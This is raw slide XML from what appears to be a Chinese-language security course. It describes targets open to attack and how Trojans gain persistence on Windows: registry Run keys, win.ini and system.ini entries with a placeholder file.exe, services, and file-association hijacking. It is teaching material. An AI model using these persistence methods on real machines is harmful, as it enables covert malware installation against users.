                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="847" h="635">
                <a:moveTo>
                  <a:pt x="257" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="132"/>
                  <a:pt x="0" y="265"/>
                  <a:pt x="30" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="461"/>
                  <a:pt x="302" y="545"/>
                  <a:pt x="438" y="590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="574" y="635"/>
                  <a:pt x="710" y="635"/>
                  <a:pt x="847" y="635"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="571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60" name="Freeform 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4140200" y="5157788"/>
            <a:ext cx="1295400" cy="792162"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 816"/>
              <a:gd name="T1" fmla="*/ 363 h 499"/>
              <a:gd name="T2" fmla="*/ 408 w 816"/>
              <a:gd name="T3" fmla="*/ 453 h 499"/>
              <a:gd name="T4" fmla="*/ 544 w 816"/>
              <a:gd name="T5" fmla="*/ 90 h 499"/>
              <a:gd name="T6" fmla="*/ 816 w 816"/>
              <a:gd name="T7" fmla="*/ 0 h 499"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 816"/>
              <a:gd name="T13" fmla="*/ 0 h 499"/>
              <a:gd name="T14" fmla="*/ 816 w 816"/>
              <a:gd name="T15" fmla="*/ 499 h 499"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="816" h="499">
                <a:moveTo>
                  <a:pt x="0" y="363"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="158" y="431"/>
                  <a:pt x="317" y="499"/>
                  <a:pt x="408" y="453"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="499" y="407"/>
                  <a:pt x="476" y="165"/>
                  <a:pt x="544" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="612" y="15"/>
                  <a:pt x="714" y="7"/>
                  <a:pt x="816" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="571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fld id="{C5307E4F-B582-4A67-9150-5A7FF4123C2E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>259</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8228737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5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5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6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5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5" grpId="0"/>
      <p:bldP spid="108557" grpId="0"/>
      <p:bldP spid="108558" grpId="0" animBg="1"/>
      <p:bldP spid="108559" grpId="0" animBg="1"/>
      <p:bldP spid="1085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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>邮件服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>名称服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与协议相关的服务 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>容易遭受攻击的目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96258"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F2DCA5E6-D9CE-4E47-BB55-FF5ADA2C3578}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1157072302"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始菜单启动项，基本上没有木马会用这种方式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动启动：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Winstart.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中启动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Autoexec.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Config.sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中加载运行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注册表：隐蔽性强，多数木马采用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>win.ini/system.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：有部分木马采用，不太隐蔽。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>捆绑方式启动：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>捆绑到一般的常用程序或服务上。隐蔽性强，多数木马采用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黑客确定捆绑方式、捆绑位置、捆绑程序等，位置多变使木马有很强的隐蔽性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非捆绑：在注册表等位置留下痕迹，容易被发现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改文件关联</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168962" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特洛伊木马加载及启动方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B89E7E2B-77B0-4492-93D0-3240C2BDF6BA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>260</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Win.ini:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    [Windows]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>run=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>c:\windows\file.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>load=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>c:\windows\file.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> System.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>[boot]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    shell=explorer.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>file.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载方式－启动文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F19E98FC-B914-4C78-8ED5-AE6399B1476F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>261</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99170033"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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A9342A4-44D2-451A-81C2-421D11A681F5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>262</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415746" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载方式－注册表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415747" name="Picture 3" descr="regrun"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1268760"/>
            <a:ext cx="7416800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415748" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="5517232"/>
            <a:ext cx="7920037" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26667012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5747"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415747"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4157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5748"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415748"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415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14AAA6A1-630E-4037-B9B3-B87E4CFD132C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>263</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417794" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="228600"/>
            <a:ext cx="7793038" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载方式－服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="417795" name="Picture 3" descr="未命名"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1470025"/>
            <a:ext cx="7416800" cy="5235575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20783293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gtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417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正常情况：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Notepad.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打开。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关联木马：修改关联方式，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关联到木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HKEY_CLASSES_ROOT\txtfile\shell\open\command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%SystemRoot%\system32\NOTEPAD.EXE %1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%path%……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
